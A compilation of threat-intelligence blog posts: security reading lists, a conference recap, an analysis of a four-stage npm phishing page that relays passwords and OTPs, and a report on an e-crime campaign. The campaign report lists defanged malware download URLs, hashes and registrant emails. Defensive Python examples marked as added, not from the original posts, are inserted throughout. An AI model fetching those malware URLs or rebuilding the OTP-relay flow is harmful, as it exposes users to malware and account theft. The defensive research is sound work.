SecuritySnacks

SECURITYSNACKS
Cybersecurity Reading List - Week of 2025-11-24

Commentary followed by links to cybersecurity articles that caught our interest internally.

(courtesy of cR0w)

Infosec, know thyself. 

It’s no surprise that I’m an advocate for deeply introspective paths. My autism positions me for rumination (and much overthinking), but also self-examination and self-evaluation in order to identify strengths to capitalize on and inefficiencies to drum out. In talks I give on autism in cybersecurity with my good friend and work partner from the TechOps side, we emphasize engaging in substantive evaluation of your own thinking, reactions, and sensitivities in relation to your work and environment. 

At the right dose, self-reflection can be a superpower all its own, as well as enable more superpowers in its wake. 

When cybersecurity professionals become vulnerable enough to engage in metacognitive and other reflection in public, it makes us all better defenders. One good example can often be found amidst Tricia Howard’s work over at Akamai - whether she’s writing on resilience, toxicity and mental health, and more. 

The recent example I want to really amplify here, though, is a great piece from the folks at SpyCloud published on Halloween: It All Counts: From Small Wins to Global Takedowns, How Being Mission-Driven and Curious Influences Cybersecurity Investigations for Good

You had me at “mission-driven”; after all, the RAND study quote on neurodivergents being essential for national security due to “missions that are too important and too difficult to be left to those who use their brains only in typical ways” is deeply resonant with me. You also had me at “curious” - every investigation I approach, I do so with a natural sense of curiosity that makes it all the richer. But SpyCloud’s piece revolving around their investigators sitting down to talk brains and wins provides even more insight.

From connecting threat actor motivation to behavior and likely evolution, to being able to influence threat actor decision-making in impactful ways, and motivating the team itself by empowering curiosity and impacting justice in the wider world, the conversation speaks deeply to me about critical lessons for our profession, and our industry. 

To quote the piece, “iron sharpens iron, and together we get better.”

Let’s work together to form and maintain the sharpening blocks we need to make 2026 the worst year for threat actors on record.

Let’s go. 

Articles

GreyNoise Intelligence - When Bulletproof Hosting Proves Bulletproof: The Stark Industries Shell Game - Excellent, brief article from GreyNoise's boB Rudis with clear technical observations for evaluating the sanctions on Stark. We need more of this, and we need to prioritize review of our current enforcement methods. More on this to come…

KrebsOnSecurity - Aisuru Botnet Shifts from DDoS to Residential Proxies - Aisuru’s power boggles the mind, as seen in this recent BleepingComputer article, but its evolution is even more interesting. Some of its roots appear to spring from Minecraft disputes, others to embarrass the Chinese Communist party. And the move to offer residential proxy access is not a welcome development.

BBC - A Chinese firm bought an insurer for CIA agents - part of Beijing's trillion dollar spending spree - This should perhaps precipitate a much wider review of PRC-owned assets with deep data insights on critical American sectors. Data is now national security-critical infrastructure. 

DomainTools Investigations - APT35 Internal Leak of Hacking Campaigns Against Lebanon, Kuwait, Turkey, Saudi Arabia, Korea, and Domestic Iranian Targets - From us last week, another natsec deep dive. I’m always fascinated by structural differences between threat actor groups, especially nation-state ones. In this case, it’s the regimented and almost rigid structure, contrasted with more flexible APT schemas.

CISA - Bulletproof Defense: Mitigating Risks From Bulletproof Hosting Providers - Overdue, but a good starting reference on BPH. Necessary to highlight CISA’s advice here on ASN blocking, an absolutely critical feature that many commercial products lack. Looking at you here, Palo. 

NYT - Cryptographers Held an Election. They Can’t Decrypt the Results. - Turns out someone lost the key. Ironic but relatable - there but for the grace of Shamir go I. 

TechCrunch - CrowdStrike fires ‘suspicious insider’ who passed information to hackers - Going to be interesting to see if charges are filed - opening Crowdstrike up to discovery there. If I was a betting man…

Mandiant - Frontline Intelligence: Analysis of UNC1549 TTPs, Custom Tools, and Malware Targeting the Aerospace and Defense Ecosystem - Iran-nexus actor with a pretty complicated portfolio compared to some of their pals. 

Politico - Cybersecurity breach at Congressional Budget Office remains a live threat - At least it’s not the State Department this time? Smells faintly like Chinese trade espionage, but that’s entirely speculation. 

SpyCloud - October Cybercrime Update: LummaC2’s Decline, Data Theft Extortion & Hacktivist Leaks - Good roundup on a few fronts, but especially the LummaC2 update. Someone’s got Lumma in their sights, or perhaps multiple someones. 

Research Papers and Reports

Anthropic - Disrupting the first reported AI-orchestrated cyber espionage campaign - There is some ongoing controversy about this report, and understandably so. Anthropic’s reports tend to be higher-quality than the other AI firms out there, and in a narrative sense they explain their analysis well - operational tempo, request volumes, and activity patterns seem the right way to do it. But we need IOCs, TTPs, and other technical indicators as narratives are not enough. It’s worth noting that it took a while to convince any industry to share those, so here’s hoping Anthropic blazes the trail with this as well. 

arXiv - Adversarial Poetry as a Universal Single-Turn Jailbreak Mechanism in Large Language Models - This may be my favorite paper ever on LLMs. There’s something incredibly funny in the Humanities coming back to haunt a technology industry and educational system that systematically defunded and deprioritized them. 

Cybersecurity Reading List - Week of 2025-10-27

Commentary followed by links to cybersecurity articles that caught our interest internally.

It’s almost November, and I’m behind on my reading. 

Which isn’t anything new - I’ve been behind on my reading since about sixth grade. But the uptick in infosec-related news and activity definitely feels substantial, a crescendo building towards the end of the year, or next year’s spring offensives, or whatever’s looming over the Taiwan Strait. 

De-escalation feels like a quaint notion. The cosmic microwave background of China-nexus actor persistence and ever-present staccato of Russian organized crime and nation-state operations vie for different forms of our attention, but never our rest. 

F5 network dwell time has been reported as nearly two years; nearly two years from initial compromise to detection, making coffee every day, going through life events, picking the kids up from soccer practice, two sets of holiday parties. 

One of the things I’m stuck thinking about as the days get longer in multiple ways is time. F5 is not the only one that’s had a dwell time like that, and it’s certainly a difference from short-duration actors with more traditional criminal motives. But we’re also seeing the landscape change as Large Language Model-assisted cyber operations begin surfacing. Most uses there are in their infancy, similar to the defender usage of LLMs - still in the “horseless carriage” phase of technology, to steal a concept from Douglas Rushkoff. But they’re maturing - slow, fast, and otherwise. 

Looking back to some earlier artificial intelligence work, Google’s AlphaGo took several years to gain mastery level in the game Go, across thirty million games. AlphaGo Zero reached mastery in 4.9 million games, and learned how to beat AlphaGo after 3 days when pitted against it adversarially. OpenAI’s Dota 2 bot amassed 45,000 years of experience in ten months’ time. This was all years ago.

I am left wondering, if AI-based cyber threat offense reaches a more mature level, what happens when you take a system that can learn centuries’ worth of lessons in days, and connect it with strategic actors whose focus is sometimes across decades. 

What does that do to time? 

And in the interests of time, let’s move on to the news and chatter. 

Several of us from DomainTools Investigations will be at CYBERWARCON in Arlington, VA on November 19th. If you’re there as well, don’t hesitate to say hello. Or tell us your secrets. 

We’re good at secrets. 

Podcasts

Three Buddy Problem - JAGS LABScon 2025 keynote: Steps to an ecology of cyber - Like last month, also from LABScon; in this case, Juan Andres Guerrero-Saade’s keynote presentation on the state of cybersecurity, how to navigate it, and what to look for next. Thirty minutes of some of the best cross-disciplinary exploration I’ve heard. 

China Talk - PLA Purges and How Xi Rules with Jon Czin - Background and practical implementation of the thinking and planning that informs the Chinese government’s operational stances. 

Lawfare - CYBERCOM Legal Conference: The Role of the Private Sector in Conflict - Reposted episode from April but a good panel on public/private work in cyber, specifically in the context of conflict.

Articles

Bloomberg - Hackers Had Been Lurking in Cyber Firm F5 Systems Since 2023 - This has been a bit of a sleeper story so far, but most of the watershed compromises haven’t been declared yet. Spent a night or three tracking possible DNS threads that roughly indicated the same time fence, but you never know until it’s out in print.

GTIG - Pro-Russia Information Operations Leverage Russian Drone Incursions into Polish Airspace - Rare (I think?) and very well-done Google Threat Intelligence piece on opportunistic hybridity in a real-world information campaign. All the notional borders we build fade into the background once feedback loops between cyber, info, and kinetic blend natively like the rest of the world. 

Infoblox - Vault Viper: High Stakes, Hidden Threats - The ubiquity of gambling alongside fraud in cyber threat intelligence is no surprise to analysts, but the interconnections and scale often astound. Infoblox doing one of those things they do so well: sketch the outline of the badness, isolate and connect clusters, and lay it all out at micro- and macro-levels. 

RecordedFuture - Dark Covenant 3.0: Controlled Impunity and Russia’s Cybercriminals - “Cybercrime in this environment cannot be understood solely as a commercial enterprise; it is also a tool of influence, a means of information acquisition, and a liability when it threatens domestic stability or undermines Russian interests.” - Fascinating deep-dive that paints a much more complex and ambiguous picture of Russian state interaction with cybercrime groups than we’re used to.

Trail of Bits - Prompt injection to RCE in AI agents - Great writeup centering around mapping and exploiting commands marked as “safe” in AI agents and thus allowed to circumvent human review. 

Ars Technica - New image-generating AIs are being used for fake expense reports - Well that’s creative. Admittedly, as a teen I pulled a dot matrix printer and Tandy out of the attic to forge my report cards (which worked great in the short term, not so much in the long term, but that’s a story for another time). 

Research Papers and Reports

arXiv - Living Off the LLM: How LLMs Will Change Adversary Tactics - Speculative paper on translating LLM proficiencies into living-off-the-land techniques for adversaries. Read, and start planning. 

Dartmouth ISTS - From Chaos To Capability: Building the US Market for Offensive Cyber - Novel research specifically around private-sector circumstances supporting government cyber operations, including current state of play, gaps, and opportunities in this largely gray area. Feels substantially different from the separate hybrid models we’re used to reading about in China and Russia, among other places. 

DomainTools Investigations BSides NoVa Recap

Ian Campbell's recap of DTI's participation at BSides NoVa

As one part of the broader infosec community, it’s one of our pillars within DomainTools Investigations to contribute meaningfully to collective knowledge as well as common good. We believe that doing so reinforces the fact that cybersecurity is a living ecosystem - an ecosystem of ecosystems, in fact - and thrives or withers accordingly. From Head of Investigations Daniel Schwalbe down through the ranks, we want to see a thriving ecosystem, and there’s no other way to do it than to put our money and time where our mouths are.

You’ve got to have some skin in the game.

One great example of security community activity is BSides NoVa, which happened October 10 & 11. We stepped up as a Gold sponsor alongside other great organizations to bring together a diverse group, from folks looking to enter the industry to those retired from decades in it. In addition, we submitted two talks that were accepted: my colleague Malachi Walker’s talk on cyber threats in F1 racing, and my talk on DNS and domain intelligence in investigative journalism.

BSides is more than just a professional opportunity for me - it’s a deeply personal part of my path into and within infosec. While information security and cybersecurity have always been special interests of mine, the first conference I attended where I really felt the passionate burn to be an integral part of it all was a Security BSides conference, BSides Boston 2016. I sat in Microsoft’s NERD facility (not kidding about the name!) and felt the first undeniable yearning to be doing the cool work that speakers presented, even though I could only half-follow most of it at the time.

From the smallest BSides in a local meeting hall to major events like BSides CHARM, Las Vegas, or NoVa, both the model and the reality represent some of the best our community has to offer. It fills me with pride to be part of an organization that could sponsor this event.

For my part, I was honored to speak to a full room about DomainTools’ history of enabling investigative journalists and security researchers in the community through our Grant access program. We’ve been presenting at the NICAR journalism conference for nearly a decade now, grateful that interest drives not one but two NICAR sessions. In addition to access, we’ve been providing training and investigative support and review to help journalists identify objective truths in data that inform their investigations. 

Earlier this year we provided a technical writeup on one such investigation over on our corporate blog, and the details there formed the backbone of this presentation as we demonstrated the value of both DNS records and Whois/RDAP data in unraveling layers of truths. We were also able to highlight several other places where either our data proved helpful or we collaborated with journalists and investigators directly this year alone, including CitizenLab, Reuters, and the prolific Brian Krebs. 

Slides for my presentation can be found here on Google Drive (contact me if you need them placed for download elsewhere).

In addition to the slides, I’d like to reiterate my answer to one of the Q&A questions at the end. The session participants were awesome and engaged, across all levels of familiarity with DNS and domain data, and asked excellent questions. One of the better questions was “Where do I learn how to do this kind of work?”

As my introduction slide notes, I’ve got no degrees and no certifications. I cannot speak to higher education or training programs. What I can say is that learning from the folks actually doing the work is key. There are very few areas in which I have so much knowledge that I can claim to be a subject matter expert (which troubles me sometimes as far as both impact and career go). But where I excel is identifying work that I want to be doing, finding the people already doing it, and reverse-engineering their processes to build my own. In practice, this looks like not just reading investigations from Brian Krebs, Shelby Grossman, Renee Diresta, CitizenLab, or Infoblox’ Threat Intel team, but actually writing down and analyzing each step of their investigation to learn where and how they pivot from one piece of data to another, as well as areas they focus on as often fruitful investigatory avenues. 

Another great source is journalist Craig Silverman, who devotes his time to teaching other journalists how to dive deep digitally. In addition, pay attention to the various places where Yael Grauer pops up, from Consumer Reports and the Associated Press to DEF CON, especially around privacy or public interest/technology & integrity issues. 

Learn from folks doing the work - and then change, adapt, iterate, and customize it. Make it your own.

And go make a splash.

My thanks to BSides NoVa, its sponsors, and everyone who came to my talk or that I talked with on Saturday. We are the ecosystem. Let’s dig, share, and thrive.

SecuritySnack: Repo The Repo - NPM Phishing

A deep dive into the 4-stage NPM phishing attack flow that led to high-profile repository account takeover. Protect your development security.

Recently, a series of high-profile supply chain compromises were caused by malicious code published to npm packages using stolen developer credentials. While maintainers of prominent npm packages have been targeted for many years, the widespread nature of these events prompted CISA to release an alert. Attackers stole developer accounts through a phishing campaign built on fake npm management and login pages. This tactic enabled them to take over accounts for malicious activity, and it remains one of the most common and effective methods of credential theft.

Details

npmjs is the largest JavaScript package registry, with two official domains: npmjs.com is the main site, and npmjs.org is also an official npm domain. Phishers have historically used variations of these domains to deceive users, most commonly through typosquatting with domains like “npnjs[.]com”; an “n” swapped for an “m” is particularly easy to overlook in lowercase characters. 

Examining a recently spoofed npm login page configuration on the domain “npmjs[.]pro” shows how the attack progresses through four distinct stages, each designed to capture a piece of information or to move the user into the next step.

Stage 1: Homepage Lure

This is the initial landing page of the phishing site, designed to build trust and initiate the login flow.

The “Sign In” control on the lure is a relative link. On the malicious domain, clicking it sends the user to the /login path on the attacker's server, not to the legitimate npmjs[.]com. The attacker's server logs the request and serves the fake login page (Stage 2) in response.

Stage 2: Initial Credential Capture

After being funneled from the fake homepage, the user is presented with the fake login form.

The form's action="/login/" posts the submitted username and password to a script on the attacker's server, which captures and logs them. It then uses them to start a login attempt against the real npmjs[.]com, which triggers a legitimate email OTP to the victim. At this point the user's primary npm credentials (username and password) are compromised, and the next stage is to retrieve their MFA/OTP code.

Stage 3: MFA / OTP Code Interception

The attacker's server immediately presents a page to intercept the second-factor authentication code.

This form captures the value from the name="otp" field and sends it to the /login/email-otp endpoint on the attacker's server. The user receives a real OTP via email (triggered by the attacker), which reinforces their belief that the process is secure. The attacker's server receives the valid OTP and now possesses all information required to hijack the account.

Stage 4: Session Hijack and Evasion

This final stage is a server-side action to complete the attack. 

The attacker uses the captured credentials and OTP to establish their own authenticated session on the real npmjs[.]com, then redirects the victim to avoid suspicion. The attacker now has full, authenticated access to the victim's npm account. The victim remains unaware that their account and session have been compromised. Their browser redirects them to the real npm sign-in page, making them believe the process did not complete.

Conclusion

This detailed attack flow for credential theft and account takeover shows that classic credential harvesting tactics remain highly effective. As our reliance on shared software supply chains grows, developer vigilance has never been more important. Multi-factor authentication (MFA) is an essential defense, but this example shows that an OTP is only as secure as the domain it is entered into: a code delivered by email or generated by an authenticator app can be relayed to the real site in real time, exactly as Stages 2 through 4 do. Always verify the URL in your address bar before entering credentials, and adopt phishing-resistant MFA such as FIDO2/WebAuthn hardware security keys or passkeys, which bind the authentication to the legitimate origin and cannot be replayed from a lookalike domain.
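Added example, not code from the post or from DomainTools: why the relayed OTP in Stage 3 works and a WebAuthn assertion would not. The browser, not the page script, writes the origin into clientDataJSON, and the authenticator signs over it, so an assertion produced on npmjs[.]pro is rejected by a relying party that expects the real origin. The expected origin string, the challenge bytes and the OTP value are assumed for the example; signature verification is noted but omitted.

```python
from __future__ import annotations

import base64
import json

# Assumed relying-party origin for the example; not taken from the post.
EXPECTED_ORIGIN = "https://www.npmjs.com"


def b64url_encode(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode("ascii")


def b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def make_client_data(origin: str, challenge: bytes) -> str:
    """What the browser itself writes into clientDataJSON for an authentication
    ceremony run on `origin`. Page script cannot alter it, and the authenticator's
    signature covers SHA-256(clientDataJSON)."""
    body = {"type": "webauthn.get",
            "challenge": b64url_encode(challenge),
            "origin": origin,
            "crossOrigin": False}
    return b64url_encode(json.dumps(body, separators=(",", ":")).encode())


def verify_client_data(client_data_b64: str, expected_challenge: bytes,
                       expected_origin: str = EXPECTED_ORIGIN) -> tuple[bool, str]:
    """Relying-party checks on clientDataJSON. The signature check over
    authenticatorData || SHA-256(clientDataJSON) is what makes these fields
    trustworthy; it is left out to keep the example focused on origin binding."""
    try:
        data = json.loads(b64url_decode(client_data_b64))
    except (ValueError, UnicodeDecodeError):
        return False, "clientDataJSON is not valid JSON"
    if data.get("type") != "webauthn.get":
        return False, "wrong ceremony type"
    if data.get("challenge") != b64url_encode(expected_challenge):
        return False, "challenge mismatch: stale or replayed assertion"
    if data.get("origin") != expected_origin:
        return False, f"origin mismatch: assertion was produced for {data.get('origin')!r}"
    return True, "ok"


def otp_is_valid(submitted: str, issued: str) -> bool:
    """An emailed or app-generated OTP carries no origin at all: whoever holds the
    digits can present them to the real site, which is what the Stage 3 relay does."""
    return submitted == issued


if __name__ == "__main__":
    challenge = b"\x11" * 32                                      # constructed server nonce
    on_real_site = make_client_data(EXPECTED_ORIGIN, challenge)
    on_phish = make_client_data("https://npmjs.pro", challenge)  # the lure domain, refanged
    print(verify_client_data(on_real_site, challenge))
    print(verify_client_data(on_phish, challenge))
    print(otp_is_valid("482913", "482913"))                      # passes wherever it was typed
```

The phishing server can forward the victim's password and OTP because neither value says where it was entered; it cannot forward a WebAuthn assertion because the origin it would need to forge sits under the authenticator's signature.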

IOCs

The IOCs below are recently registered lookalike and typosquatted domains of npmjs. 

npmjscdn[.]xyz
npmjs[.]us
npmjs[.]pro
npmjs[.]us[.]org
npmjs[.]us[.]com
npmjs[.]se
npmjs[.]work
npmjs[.]online
npmjs[.]wtf
npmjs[.]help
npmjs[.]cam
npmjs[.]web[.]id
npmjs[.]support
npnjs[.]org
npnjs[.]com
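Added example, not code from the post or from DomainTools: a triage function for the kinds of lookalike seen in the list above (brand on a wrong suffix, brand embedded in a longer label, one-letter typos, and homoglyphs), suitable for running over newly registered domains or DNS logs. The similarity threshold, the small confusable map and the three control entries in the sample list are assumptions; the rest of the sample is the IOC list.

```python
from __future__ import annotations

import unicodedata
from difflib import SequenceMatcher

OFFICIAL = ("npmjs.com", "npmjs.org")   # the two official domains named in the post
BRAND = "npmjs"
TYPO_THRESHOLD = 0.8   # assumed cut-off: one swapped letter in a five-letter label scores exactly 0.8

# Assumed, deliberately small confusable map: Cyrillic letters that render like Latin ones.
CONFUSABLES = str.maketrans({"\u0458": "j", "\u0455": "s", "\u0440": "p", "\u043c": "m"})


def refang(domain: str) -> str:
    """Turn the defanged form used in IOC lists back into a hostname."""
    return domain.strip().lower().replace("[.]", ".").replace("(.)", ".").rstrip(".")


def skeleton(label: str) -> str:
    """Decode punycode and fold lookalike glyphs so 'npmјs' (Cyrillic ј) compares as 'npmjs'."""
    if label.startswith("xn--"):
        try:
            label = label.encode("ascii").decode("idna")
        except UnicodeError:
            return label
    return unicodedata.normalize("NFKC", label).translate(CONFUSABLES)


def classify(domain: str) -> str:
    d = refang(domain)
    if any(d == o or d.endswith("." + o) for o in OFFICIAL):
        return "official"
    raw = [lab for lab in d.split(".") if lab]
    skel = [skeleton(lab) for lab in raw]
    canon = ".".join(skel)
    if canon != d and any(canon == o or canon.endswith("." + o) for o in OFFICIAL):
        return "homoglyph"
    body = skel[:-1] if len(skel) > 1 else skel   # judge every label except the TLD
    if BRAND in body:
        return "brand-on-wrong-suffix"            # npmjs[.]pro, npmjs[.]us[.]org, npmjs.com.evil.example
    if any(BRAND in lab for lab in body):
        return "brand-embedded"                   # npmjscdn[.]xyz
    if any(SequenceMatcher(None, lab, BRAND).ratio() >= TYPO_THRESHOLD for lab in body):
        return "typosquat"                        # npnjs[.]com
    return "unrelated"


def triage(domains: list[str]) -> dict[str, list[str]]:
    """Group a candidate list (new registrations, DNS or proxy logs) by verdict."""
    out: dict[str, list[str]] = {}
    for dom in domains:
        out.setdefault(classify(dom), []).append(refang(dom))
    return out


# The post's IOC list plus three constructed controls: an official name, a homoglyph, an unrelated domain.
SAMPLE = [
    "npmjscdn[.]xyz", "npmjs[.]us", "npmjs[.]pro", "npmjs[.]us[.]org", "npmjs[.]us[.]com",
    "npmjs[.]se", "npmjs[.]work", "npmjs[.]online", "npmjs[.]wtf", "npmjs[.]help", "npmjs[.]cam",
    "npmjs[.]web[.]id", "npmjs[.]support", "npnjs[.]org", "npnjs[.]com",
    "registry.npmjs.org", "npm\u0458s[.]com", "example.com",
]

if __name__ == "__main__":
    for verdict, doms in triage(SAMPLE).items():
        print(f"{verdict:22s} {', '.join(doms)}")
```

The "official" check is deliberately a suffix match on the full hostname, so npmjs.com.evil.example is not mistaken for a legitimate subdomain; a production version would use the Public Suffix List rather than dropping only the last label.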


SecuritySnack: 18+E-Crime

Starting in September 2024, a financially motivated cluster of more than 80 spoofed domain names and lure websites began targeting users with fake applications and websites themed as government tax sites, consumer banking, age 18+ social media content, and Windows assistant applications. The actor used these spoofed domains to deliver Android and Windows trojans, likely to steal credentials, and in other cases harvested credentials more overtly through fake login pages.

Details

Windows Installation Assistant download themed websites such as the following were used to deliver Windows trojans.

ms32-download[.]pro

corp-ms32-download[.]pro

Download URL: https[:]//cozzystaysemarang[.]com/temp/winsetup-stable-windows_x86_x64_software_package_revision_final.exe

Filename: winsetup-stable-windows_x86_x64_software_package_revision_final.exe

Sha256: 3767140145cef85204ddec1285f5dc8544bfcf8ff22318c11073baaa476385fc

The same delivery domain was previously observed delivering APK files in June 2025.

APK Sha256: a83a442f930fea310d391f852385e3673d8c7128e5bbdc2b68217838c78381fa

More recent versions used a different domain and a very long URL, likely to hide the filename from automated security tools and, to a lesser extent, from human review. The run of percent-encoded spaces (%20) and the overall length can defeat detection rules or regular expressions that expect a clean filename immediately after the last slash, or that cap the length of the URL they inspect.

Download URL:

https[:]//fleetfedx[.]com/Installer%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20em_OtvJCxP1_installer_Win7-Win11_x86_x64.msi

SHA256: 71cd466073bf23b43111dbc68ccaf1064e737f3f9ffebfec9a6f5146af6a34b9
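Added example, not code from the post or from DomainTools: the normalization a URL detection rule needs so that the padded path above is judged on its decoded filename rather than on the raw string. The first sample is the download URL quoted above; the second has the shape of the fleetfedx URL with the %20 run fixed at 150 repetitions, which is an assumption, as are the naive rule and the lure-word list.

```python
from __future__ import annotations

import re
from urllib.parse import unquote, urlsplit

# A rule of the kind that misses the padded URL: it expects a clean filename token
# directly after the last slash, so any percent-escape in that segment breaks the match.
NAIVE_RE = re.compile(r"/([\w\-]+)\.(?:msi|exe)$", re.I)

# Rules applied to the normalized final path token instead.
BINARY_EXT_RE = re.compile(r"\.(?:msi|exe|scr|bat|js)$", re.I)
LURE_WORDS_RE = re.compile(r"install|setup|win(?:dows)?\d*|x86|x64|assistant", re.I)


def refang(url: str) -> str:
    return url.strip().replace("hxxp", "http").replace("[:]", ":").replace("[.]", ".")


def analyze_url(url: str) -> dict:
    url = refang(url)
    parts = urlsplit(url)
    decoded = unquote(parts.path)                      # %20 -> ' ', %2E -> '.', and so on
    collapsed = re.sub(r"\s+", " ", decoded).strip()   # a run of whitespace becomes one space
    last_segment = collapsed.rsplit("/", 1)[-1]
    tokens = last_segment.split()
    filename = tokens[-1] if tokens else ""            # the real filename hides behind the padding
    whitespace = sum(ch.isspace() for ch in decoded)
    return {
        "host": parts.hostname,
        "filename": filename,
        "padding_len": len(decoded) - len(collapsed),  # how much the path was inflated
        "whitespace_ratio": round(whitespace / len(decoded), 2) if decoded else 0.0,
        "naive_hit": bool(NAIVE_RE.search(url)),
        "normalized_hit": bool(BINARY_EXT_RE.search(filename) and LURE_WORDS_RE.search(filename)),
    }


def is_suspicious(url: str) -> bool:
    """Judge the decoded filename, and treat heavy padding itself as a signal:
    no legitimate file is named with a hundred-plus spaces in front of it."""
    r = analyze_url(url)
    return r["normalized_hit"] or r["whitespace_ratio"] > 0.5


# Constructed samples (see lead-in).
PLAIN_URL = ("https[:]//cozzystaysemarang[.]com/temp/"
             "winsetup-stable-windows_x86_x64_software_package_revision_final.exe")
PADDED_URL = ("https[:]//fleetfedx[.]com/Installer" + "%20" * 150
              + "em_OtvJCxP1_installer_Win7-Win11_x86_x64.msi")

if __name__ == "__main__":
    for u in (PLAIN_URL, PADDED_URL):
        print(analyze_url(u))
```

The naive rule fires on the first URL and not on the second; after decoding and collapsing whitespace, both resolve to an installer-named binary, and the padding ratio alone is enough to flag the second even if the filename were innocuous.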

The download links also fire a Facebook Pixel event in their onclick handler: onclick="fbq('track', 'Lead');". “Lead” is one of the Pixel's standard conversion events, which indicates that the attacker is running this as a marketing-style campaign. They are likely using Facebook ads or other paid traffic to drive users to the fake page and are tracking their "conversion rate", a measure of how many people they successfully trick into clicking the malicious download link.

Facebook Tracker Ids:

  • 1354988235984551
  • 690114973584418
  • 1327164645166821

Additionally, a Yandex tracker was also identified in use: 97105740

Connective Tissue

Registrar

  • PDR Ltd. d/b/a PublicDomainRegistry.com
  • GMO Internet, Inc.

IP ISP

  • BL Networks
  • H2nexus Ltd
  • H2.nexus Frankfurt Network

Name Server Domain

  • regway[.]com

Top Level Domains

  • Pro, Shop, Com, Icu, Top

Registrant Email Domains

  • fviainboxes[.]com
  • dropjar[.]com
  • replyloop[.]com
  • yopmail[.]com
  • robot-mail[.]com
  • protonmail[.]com

Trackers

  • Facebook: 690114973584418
  • Facebook: 1327164645166821
  • Facebook: 1354988235984551
  • Yandex: 97105740
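Added example, not code from the post or from DomainTools, covering both the tracker paragraph and the Connective Tissue pivots above: extract Facebook Pixel and Yandex.Metrica IDs from fetched page bodies and cluster domains that share one, which is how a tracker ID becomes a pivot key alongside registrar, name server and registrant email. The page bodies are constructed; the domains and IDs come from the post, but which ID sits on which page is assumed.

```python
from __future__ import annotations

import re
from collections import defaultdict

# Facebook Pixel bootstrap and its <noscript> fallback; Yandex.Metrica init and its watch pixel.
TRACKER_PATTERNS = {
    "facebook": [
        re.compile(r"fbq\(\s*['\"]init['\"]\s*,\s*['\"](\d{6,20})['\"]"),
        re.compile(r"facebook\.com/tr\?id=(\d{6,20})"),
    ],
    "yandex": [
        re.compile(r"\bym\(\s*(\d{5,12})\s*,\s*['\"]init['\"]"),
        re.compile(r"mc\.yandex\.ru/watch/(\d{5,12})"),
    ],
}
LEAD_EVENT_RE = re.compile(r"fbq\(\s*['\"]track['\"]\s*,\s*['\"]Lead['\"]")


def extract_trackers(html: str) -> set[tuple[str, str]]:
    """Return {(provider, id)} found in a page, de-duplicated across script and noscript copies."""
    found: set[tuple[str, str]] = set()
    for provider, patterns in TRACKER_PATTERNS.items():
        for pat in patterns:
            for m in pat.finditer(html):
                found.add((provider, m.group(1)))
    return found


def has_lead_conversion(html: str) -> bool:
    """True when a click handler fires the Pixel 'Lead' event: downloads are being counted as conversions."""
    return LEAD_EVENT_RE.search(html) is not None


def cluster_by_tracker(pages: dict[str, str]) -> dict[tuple[str, str], list[str]]:
    """Pivot: group domains that embed the same tracker ID. IDs seen on a single
    domain are dropped, since they give nothing to pivot on."""
    groups: dict[tuple[str, str], list[str]] = defaultdict(list)
    for domain, html in pages.items():
        for tracker in extract_trackers(html):
            groups[tracker].append(domain)
    return {t: sorted(ds) for t, ds in groups.items() if len(ds) > 1}


# Constructed page bodies (see lead-in). The last entry is an unrelated control with a made-up ID.
PAGES = {
    "ms32-download[.]pro": """
      <script>fbq('init', '1354988235984551'); fbq('track', 'PageView');</script>
      <noscript><img src="https://www.facebook.com/tr?id=1354988235984551&ev=PageView&noscript=1"/></noscript>
      <a href="/download" onclick="fbq('track', 'Lead');">Download Windows Installation Assistant</a>""",
    "corp-ms32-download[.]pro": """
      <script>fbq("init", "1354988235984551");</script>
      <script>ym(97105740, "init", {clickmap:true, trackLinks:true});</script>
      <a href="/get" onclick="fbq('track', 'Lead');">Download</a>""",
    "fleetfedx[.]com": """
      <script>ym(97105740, 'init', {});</script>
      <noscript><div><img src="https://mc.yandex.ru/watch/97105740" style="position:absolute; left:-9999px;"/></div></noscript>""",
    "unrelated-shop[.]example": """<script>fbq('init', '111111111111111');</script>""",
}

if __name__ == "__main__":
    for tracker, domains in sorted(cluster_by_tracker(PAGES).items()):
        print(tracker, "->", ", ".join(domains))
```

Run against crawled bodies of a candidate domain set, a shared Pixel or Metrica ID is a strong link between sites that otherwise share nothing but a registrar, and it survives the operator rotating domains, TLDs and hosting.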

The majority of the cluster’s domains targeted users with age 18+ themed TikTok, YouTube, and online gambling Android applications. Other themes involved several prominent consumer banks and cryptocurrency exchanges, including USAA, PMC, Bloomberg, and Binance. A subset of the domains served fake Windows 11 Installation Assistant and TrustCon VPN application downloads. 

A breakdown of the cluster’s domain and websites by spoofed industries shows the majority are directly financially related, including the Government tax sites.

Sample screenshots of spoofed websites for malware delivery and credential harvesting:

Conclusion

This report highlights a persistent and financially motivated cybercrime operation employing common techniques, including spoofed domains and lure websites to distribute malware and harvest credentials. 

The most common lures preyed on curiosity and desire, which can override a user's normal caution. The promise of forbidden or exclusive content is a powerful social engineering tool. Victims are also often embarrassed to admit how their device was infected, so they are less likely to report the malicious app to authorities, security vendors, or even their IT department, allowing the malware to persist longer and the campaign to remain undetected.

The operators work with the mindset of a malicious marketing firm, prioritizing scale and conversion rates over technical sophistication. Their use of template-based website builders indicates a focus on rapid deployment and disposable infrastructure, allowing them to pivot quickly and evade takedowns, browser-based warnings, and blocklisting.

Users are advised to exercise extreme caution when encountering unfamiliar links or download prompts, particularly those related to banking, social media, or system utilities.

IOCs

Emails

host_sdji21cxvmj12[@]dropjar[.]com
pq_bl_6_safs_sssw[@]fviainboxes[.]com
feleko2722[@]replyloop[.]com
lux_bl_22_fdjhgza_reg[@]fviainboxes[.]com
lux_bl_21_sdfgsun_reg[@]fviainboxes[.]com
lux_47_jkscnxkjasd[@]fviainboxes[.]com
lux_49_kcsdfer321[@]fviainboxes[.]com
lux_bl_20_ilskdfgnoi_reg[@]fviainboxes[.]com
pq-black234333123[@]clowmail[.]com
zapuwo3736[@]robot-mail[.]com
simpleflex20934[@]yopmail[.]com
m2mcion[@]protonmail[.]com

Domains

11windows[.]pro
18pllus-tiktok[.]pro
